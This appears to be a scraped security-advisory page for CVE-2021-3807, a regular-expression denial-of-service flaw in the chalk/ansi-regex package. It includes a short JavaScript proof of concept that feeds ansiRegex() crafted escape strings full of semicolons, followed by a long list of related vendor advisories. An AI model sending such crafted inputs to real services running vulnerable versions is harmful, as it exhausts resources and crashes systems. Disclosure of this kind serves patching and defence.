Lucene search
Yetingli5B3CF33B-EDE0-4398-9974-800876DFD994HistorySep 09, 2021 - 11:25 a.m.
Inefficient Regular Expression Complexity in chalk/ansi-regex
2021-09-0911:25:39
yetingli
www.huntr.dev
87
0.004 Low
EPSS
Percentile
73.6%
✍️ Description
It allows cause a denial of service when matching crafted invalid ANSI escape codes.
🕵️♂️ Proof of Concept
// PoC.mjs
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Related
hackerone
hackerone
prion
prion
Design/Logic Flaw
2021-09-17 07:15:00
cgr
cgr
CVE-2021-3807 vulnerabilities
2024-05-19 03:07:16
nvd
nvd
CVE-2021-3807
2021-09-17 07:15:09
ibm
ibm
Security Bulletin: IBM Integration Bus is vulnerable to denial of service due to ansi-regex module (CVE-2021-3807)
2022-07-04 16:16:14
Security Bulletin: Vulnerability found in Turf.js which is shipped with IBM® Intelligent Operations Center(CVE-2021-3807)
2023-09-04 12:22:16
Security Bulletin: Open Source Dependency Vulnerability
2023-05-15 18:01:27
redhatcve
redhatcve
CVE-2021-3807
2021-09-24 09:25:36
osv
osv
CVE-2021-3807
2021-09-17 07:15:09
Inefficient Regular Expression Complexity in chalk/ansi-regex
2021-09-20 20:20:09
Moderate: nodejs:16 security and bug fix update
2022-09-13 07:36:52
cvelist
cvelist
CVE-2021-3807 Inefficient Regular Expression Complexity in chalk/ansi-regex
2021-09-17 00:00:00
debiancve
debiancve
CVE-2021-3807
2021-09-17 07:15:09
ubuntucve
ubuntucve
CVE-2021-3807
2021-09-17 00:00:00
cve
cve
CVE-2021-3807
2021-09-17 07:15:09
github
github
Inefficient Regular Expression Complexity in chalk/ansi-regex
2021-09-20 20:20:09
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2021-09-20 10:48:13
openvas
openvas
OTRS Multiple Vulnerabilities (OSA-2022-04)
2022-10-19 00:00:00
SUSE: Security Advisory (SUSE-SU-2022:0569-1)
2022-02-25 00:00:00
SUSE: Security Advisory (SUSE-SU-2022:0563-1)
2022-02-25 00:00:00
nessus
nessus
CentOS 9 : nodejs-nodemon-2.0.19-1.el9
2024-02-29 00:00:00
SUSE SLES12 Security Update : nodejs12 (SUSE-SU-2022:0531-1)
2022-02-22 00:00:00
SUSE SLES15 Security Update : nodejs8 (SUSE-SU-2022:0563-1)
2022-02-24 00:00:00
suse
suse
Security update for nodejs14 (important)
2022-03-04 00:00:00
Security update for nodejs8 (important)
2022-03-04 00:00:00
Security update for nodejs12 (important)
2022-03-02 00:00:00
redhat
redhat
rocky
rocky
nodejs:16 security and bug fix update
2022-09-13 07:36:52
nodejs:16 security, bug fix, and enhancement update
2021-12-15 19:09:29
nodejs:14 security, bug fix, and enhancement update
2022-02-01 20:08:39
oraclelinux
oraclelinux
nodejs:16 security and bug fix update
2022-09-15 00:00:00
nodejs:16 security, bug fix, and enhancement update
2021-12-16 00:00:00
nodejs:14 security, bug fix, and enhancement update
2022-02-02 00:00:00
almalinux
almalinux
Moderate: nodejs:16 security, bug fix, and enhancement update
2021-12-15 19:09:29
Moderate: nodejs:14 security, bug fix, and enhancement update
2022-02-01 20:08:39
Moderate: nodejs and nodejs-nodemon security and bug fix update
2022-09-20 00:00:00
redos
redos
ROS-20240403-01
2024-04-03 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00